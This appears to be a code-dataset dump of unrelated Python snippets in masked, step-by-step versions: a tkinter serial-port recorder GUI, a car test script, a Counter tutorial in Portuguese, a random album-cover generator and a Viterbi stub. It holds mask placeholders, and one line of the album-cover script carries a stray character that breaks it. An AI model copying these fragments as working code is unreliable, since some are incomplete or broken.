'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',\n # embed_fun=embed_sum)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root.title('ChadBotX')
<|reserved_special_token_0|>
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
<|reserved_special_token_0|>
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
<|reserved_special_token_0|>
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root = tkinter.Tk()
root.title('ChadBotX')
MODE_RECORD = 1
MODE_PLAYBACK = 2
portname = tkinter.StringVar(root, '')
filename = tkinter.StringVar(root, '')
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, 'Start')
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
image = Image.open('./chad.png')
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
import tkinter
from tkinter import ttk, filedialog, messagebox
import serial.tools.list_ports
from PIL import ImageTk, Image
from read_bytes import read
root = tkinter.Tk()
root.title('ChadBotX')
MODE_RECORD = 1
MODE_PLAYBACK = 2
portname = tkinter.StringVar(root, '')
filename = tkinter.StringVar(root, '')
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, 'Start')
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
image = Image.open('./chad.png')
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
import tkinter
from tkinter import ttk, filedialog, messagebox
import serial.tools.list_ports
from PIL import ImageTk, Image
from read_bytes import read
root = tkinter.Tk()
root.title('ChadBotX')
# Define constants for mode selection
MODE_RECORD = 1
MODE_PLAYBACK = 2
# Define gui state
portname = tkinter.StringVar(root, "")
filename = tkinter.StringVar(root, "")
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, "Start")
def pick_file():
# Open file picker and return name of file selcted
newfilename = filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("Byte files","*.txt"),("all files","*.*")))
# tkinter.StringVar(root, filename)
filename.set(newfilename)
def get_ports():
# Get list of com ports
# https://pythonhosted.org/pyserial/tools.html
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if (not opt_mode or not opt_filename or not opt_mode):
return messagebox.showwarning("Error", "Invalid input")
if (opt_mode == MODE_PLAYBACK):
read(opt_filename, opt_port)
elif (opt_mode == MODE_RECORD):
print("record " + opt_filename + " " + opt_port)
action_button.set('Stop')
# Add widgets to window
image = Image.open("./chad.png")
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text="Choose file", command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text="File name:").pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text="Port:").pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0, 2), padx=(10, 10))
ttk.Radiobutton(root, text="Record", variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text="Playback", variable=mode, value=2).pack(pady=(2, 5))
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
|
flexible
|
{
"blob_id": "6455741bbda42b9d84428545ddd50a5d1b54a7ba",
"index": 1376,
"step-1": "<mask token>\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\n<mask token>\n",
"step-2": "<mask token>\nroot.title('ChadBotX')\n<mask token>\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\n<mask token>\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\n<mask token>\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-3": "<mask token>\nroot = tkinter.Tk()\nroot.title('ChadBotX')\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\nportname = tkinter.StringVar(root, '')\nfilename = tkinter.StringVar(root, '')\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, 'Start')\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\nimage = Image.open('./chad.png')\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-4": "import tkinter\nfrom tkinter import ttk, filedialog, messagebox\nimport serial.tools.list_ports\nfrom PIL import ImageTk, Image\nfrom read_bytes import read\nroot = tkinter.Tk()\nroot.title('ChadBotX')\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\nportname = tkinter.StringVar(root, '')\nfilename = tkinter.StringVar(root, '')\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, 'Start')\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\nimage = Image.open('./chad.png')\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-5": "import tkinter\nfrom tkinter import ttk, filedialog, messagebox\nimport serial.tools.list_ports\nfrom PIL import ImageTk, Image\nfrom read_bytes import read\n\nroot = tkinter.Tk()\nroot.title('ChadBotX')\n\n# Define constants for mode selection\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\n\n# Define gui state\nportname = tkinter.StringVar(root, \"\")\nfilename = tkinter.StringVar(root, \"\")\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, \"Start\")\n\ndef pick_file():\n # Open file picker and return name of file selcted\n\n newfilename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"Byte files\",\"*.txt\"),(\"all files\",\"*.*\")))\n # tkinter.StringVar(root, filename)\n filename.set(newfilename)\n \n\ndef get_ports():\n # Get list of com ports\n # https://pythonhosted.org/pyserial/tools.html\n\n ports = serial.tools.list_ports.comports()\n ports_str = []\n\n for port in ports:\n ports_str.append(port.device)\n\n return ports_str\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n\n if (not opt_mode or not opt_filename or not opt_mode):\n return messagebox.showwarning(\"Error\", \"Invalid input\")\n\n if (opt_mode == MODE_PLAYBACK):\n read(opt_filename, opt_port)\n elif (opt_mode == MODE_RECORD):\n print(\"record \" + opt_filename + \" \" + opt_port)\n\n action_button.set('Stop')\n\n# Add widgets to window\nimage = Image.open(\"./chad.png\")\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\n\nttk.Button(root, text=\"Choose file\", command=pick_file).pack(pady=(10, 7))\n\nttk.Label(root, text=\"File name:\").pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\n\nttk.Label(root, text=\"Port:\").pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0, 2), padx=(10, 10))\n\nttk.Radiobutton(root, text=\"Record\", variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text=\"Playback\", variable=mode, value=2).pack(pady=(2, 5))\n\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\n\nroot.mainloop()",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
"""
CP1404 Practical
unreliable car test
"""
from unreliable_car import UnreliableCar
def main():
good_car = UnreliableCar("good car", 100, 80)
bad_car = UnreliableCar("bad car", 100, 10)
for i in range(10):
print("try to drive {} km".format(i))
print("{:10} drove {:2}km".format(good_car.name, good_car.drive(i)))
print("{:10} drove {:2}km".format(bad_car.name, bad_car.drive(i)))
print(good_car)
print(bad_car)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "f29ad02f3781c7a7d2a1f0c97626dd5c7ea2417e",
"index": 7867,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom unreliable_car import UnreliableCar\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nCP1404 Practical\nunreliable car test\n\"\"\"\nfrom unreliable_car import UnreliableCar\n\n\ndef main():\n good_car = UnreliableCar(\"good car\", 100, 80)\n bad_car = UnreliableCar(\"bad car\", 100, 10)\n\n for i in range(10):\n print(\"try to drive {} km\".format(i))\n print(\"{:10} drove {:2}km\".format(good_car.name, good_car.drive(i)))\n print(\"{:10} drove {:2}km\".format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
<|reserved_special_token_0|>
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1)
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from collections import Counter
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1)
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
"""
Modulo collection - Counter
Collections -> High-performance Container Datatypes
Counter -> Recebe um interável como parametro e cria um objeto do tipo Collections Counter
que é parecido com um dicionario, contendo como chave o elemento da lista passada como
parametro e como valor a quantidade de ocorrencias desse elemento.
"""
# Utlizando o counter
from collections import Counter
# Exemplo 1
# Podemos utilizar qualquer iteravel, aqui usamos uma lista
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1) # chave/valor
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
# obs: cada elemento da lista ficou como chave e o valor o número de ocorrencias
print('--------------\n')
# Exemplo 2
print(f'Nasca de bacana: \n {Counter("Nasca de bacana")}')
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
#print(palavras)
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
# as 'n' mais comuns
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print("----------------------")
print(dir(Counter))
|
flexible
|
{
"blob_id": "4989d01f31ca034aacdda28eff56adb2e0bb15da",
"index": 1889,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\n<mask token>\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
"step-3": "<mask token>\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\nresultado = Counter(lista_1)\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\npalavras = texto.split()\nresultado2 = Counter(palavras)\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
"step-4": "<mask token>\nfrom collections import Counter\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\nresultado = Counter(lista_1)\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\npalavras = texto.split()\nresultado2 = Counter(palavras)\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
"step-5": "\"\"\"\r\nModulo collection - Counter\r\n\r\nCollections -> High-performance Container Datatypes\r\n\r\nCounter -> Recebe um interável como parametro e cria um objeto do tipo Collections Counter\r\nque é parecido com um dicionario, contendo como chave o elemento da lista passada como\r\nparametro e como valor a quantidade de ocorrencias desse elemento.\r\n\r\n\"\"\"\r\n\r\n# Utlizando o counter\r\n\r\nfrom collections import Counter\r\n\r\n# Exemplo 1\r\n\r\n# Podemos utilizar qualquer iteravel, aqui usamos uma lista\r\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\r\n\r\nresultado = Counter(lista_1) # chave/valor\r\n\r\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\r\n# obs: cada elemento da lista ficou como chave e o valor o número de ocorrencias\r\nprint('--------------\\n')\r\n\r\n# Exemplo 2\r\n\r\nprint(f'Nasca de bacana: \\n {Counter(\"Nasca de bacana\")}')\r\n\r\nprint('--------------\\n')\r\n\r\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\r\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\r\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\r\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\r\n\r\npalavras = texto.split()\r\n\r\n#print(palavras)\r\nresultado2 = Counter(palavras)\r\n\r\nprint(f'ocorrencias de palavras: {resultado2}')\r\n\r\n# as 'n' mais comuns\r\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\r\nprint(\"----------------------\")\r\n\r\nprint(dir(Counter))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Inspiration: [Fake Album Covers](https://fakealbumcovers.com/)
from IPython.display import Image as IPythonImage
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
import requests
from xml.etree import ElementTree as ET
def display_cover(top,bottom ):
name='album_art_raw.png'
album_art_raw = requests.get('https://picsum.photos/500/500/?random')
with open(name,'wb') as album_art_raw_file:
album_art_raw_file.write(album_art_raw.content)
img = Image.open("album_art_raw.png")
draw = ImageDraw.Draw(img)
band_name_font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf", 25) #25pt font
album_name_font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf", 20) # 20pt font
band_x, band_y = 50, 50
album_x, album_y = 50, 400
outline_color ="black"
draw.text((band_x-1, band_y-1), top, font=band_name_font, fill=outline_color)
draw.text((band_x+1, band_y-1), top, font=band_name_font, fill=outline_color)
draw.text((band_x-1, band_y+1), top, font=band_name_font, fill=outline_color)
draw.text((band_x+1, band_y+1), top, font=band_name_font, fill=outline_color)
draw.text((album_x-1, album_y-1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x+1, album_y-1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x-1, album_y+1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x+1, album_y+1), bottom , font=album_name_font, fill=outline_color)
draw.text((band_x,band_y),top,(255,255,255),font=band_name_font)
draw.text((album_x, album_y),bottom,(255,255,255),font=album_name_font)
return img
wikipedia='https://en.wikipedia.org/wiki/Special:Random'
page = requests.get(wikipedia).text.strip()
file= ET.fromstring(page).find('head/title')
band_title = file.text.replace(' - Wikipedia','')
wikipedia='https://en.wikipedia.org/wiki/Special:Random'
page = requests.get(wikipedia).text.strip()p
file= ET.fromstring(page).find('head/title')
album_title = file.text.replace(' - Wikipedia','')
print(album_title)
print("Your band: ", band_title)
print("Your album: ", album_title)
img = display_cover(band_title,album_title)
img.save('sample-out.png')
IPythonImage(filename='sample-out.png')
|
normal
|
{
"blob_id": "07215403750be53994ae36727b6f790202b88697",
"index": 253,
"step-1": "# Inspiration: [Fake Album Covers](https://fakealbumcovers.com/)\nfrom IPython.display import Image as IPythonImage\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nimport requests\nfrom xml.etree import ElementTree as ET\n\ndef display_cover(top,bottom ):\n \n name='album_art_raw.png'\n album_art_raw = requests.get('https://picsum.photos/500/500/?random')\n \n with open(name,'wb') as album_art_raw_file:\n album_art_raw_file.write(album_art_raw.content)\n\n img = Image.open(\"album_art_raw.png\")\n draw = ImageDraw.Draw(img)\n\n band_name_font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\", 25) #25pt font\n album_name_font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\", 20) # 20pt font\n\n band_x, band_y = 50, 50\n album_x, album_y = 50, 400\n\n outline_color =\"black\"\n\n draw.text((band_x-1, band_y-1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x+1, band_y-1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x-1, band_y+1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x+1, band_y+1), top, font=band_name_font, fill=outline_color)\n\n draw.text((album_x-1, album_y-1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x+1, album_y-1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x-1, album_y+1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x+1, album_y+1), bottom , font=album_name_font, fill=outline_color)\n\n draw.text((band_x,band_y),top,(255,255,255),font=band_name_font)\n draw.text((album_x, album_y),bottom,(255,255,255),font=album_name_font)\n\n return img\n\n\nwikipedia='https://en.wikipedia.org/wiki/Special:Random'\npage = requests.get(wikipedia).text.strip()\nfile= ET.fromstring(page).find('head/title')\nband_title = file.text.replace(' - Wikipedia','')\n\nwikipedia='https://en.wikipedia.org/wiki/Special:Random'\npage = requests.get(wikipedia).text.strip()p\nfile= ET.fromstring(page).find('head/title')\nalbum_title = file.text.replace(' - Wikipedia','')\nprint(album_title)\n\nprint(\"Your band: \", band_title)\nprint(\"Your album: \", album_title)\n\nimg = display_cover(band_title,album_title)\n\n\nimg.save('sample-out.png')\n\nIPythonImage(filename='sample-out.png')",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
